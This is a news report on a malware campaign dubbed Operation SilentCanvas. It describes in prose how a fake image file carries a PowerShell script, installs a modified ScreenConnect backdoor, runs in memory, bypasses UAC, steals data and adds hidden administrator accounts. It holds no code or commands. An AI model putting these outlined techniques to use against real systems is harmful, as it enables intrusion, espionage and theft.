The researchers called this process Operation SilentCanvas.
According to reports, the attack begins by sending a file named sysupdate.jpeg via phishing emails, fake file sharing links, or even fake software updates.
Although the file looks like a regular image, it does not contain real image data. Rather, it includes a malicious PowerShell script that creates a hidden environment inside the infected device and then downloads additional components from servers controlled by the attackers.
Exploit a reliable tool
The researchers indicated that the attackers used a modified version of ScreenConnect, a legitimate tool used to remotely access and control corporate devices.
The modified version works as a back door that allows hackers to continuously enter the device without raising suspicions, especially since the program is already used in many institutional work environments.
The attack also relies on advanced techniques to bypass protection systems, including running files directly in memory without saving them on the hard disk, in addition to using trusted Windows tools to bypass the user account control window without alerting the victim.
After a successful hack, attackers are able to carry out a wide range of espionage and control operations, including live screen monitoring, video recording, audio capture via microphone, password theft, keyboard monitoring, and confidential file transfer via encrypted channels.
The software can also create a hidden environment that the user does not notice, allowing attackers to freely operate their tools without being detected.
Experts warned that the software is also capable of creating hidden administrative accounts within the system to ensure continued access even after the device is rebooted. (Erm News)
